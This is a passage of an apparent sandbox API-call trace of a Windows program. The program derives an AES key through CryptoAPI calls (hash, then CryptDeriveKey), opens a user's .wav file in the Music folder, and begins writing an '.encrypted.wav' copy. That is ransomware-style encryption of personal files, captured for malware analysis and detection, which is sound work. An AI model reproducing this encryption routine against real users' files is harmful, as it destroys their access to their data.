lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.430] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0038.430] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.430] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939c98a0, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xb4f60e50, ftLastAccessTime.dwHighDateTime=0x1d5bae1, ftLastWriteTime.dwLowDateTime=0xb4f60e50, ftLastWriteTime.dwHighDateTime=0x1d5bae1, nFileSizeHigh=0x0, nFileSizeLow=0x10944, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="SG2JCe2OU9yef2QQFr-.wav", cAlternateFileName="SG2JCE~1.WAV")) returned 0x7c2240 [0038.430] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0038.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.431] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.431] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0038.431] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.431] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.431] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.431] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0038.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.432] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0038.432] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.432] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.432] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0038.432] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.432] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.433] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.433] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0038.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.433] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0038.433] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.433] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.433] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0038.433] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.434] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.434] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.434] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.434] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.434] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.434] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.434] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.435] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.435] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0038.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.435] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.435] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.435] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.435] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0038.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.436] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0038.436] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.436] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.436] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sg2jce2ou9yef2qqfr-.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.436] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.436] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.436] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.437] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.437] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.438] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0038.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SG2JCe2OU9yef2QQFr-.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\sg2jce2ou9yef2qqfr-.encrypted.wav"), 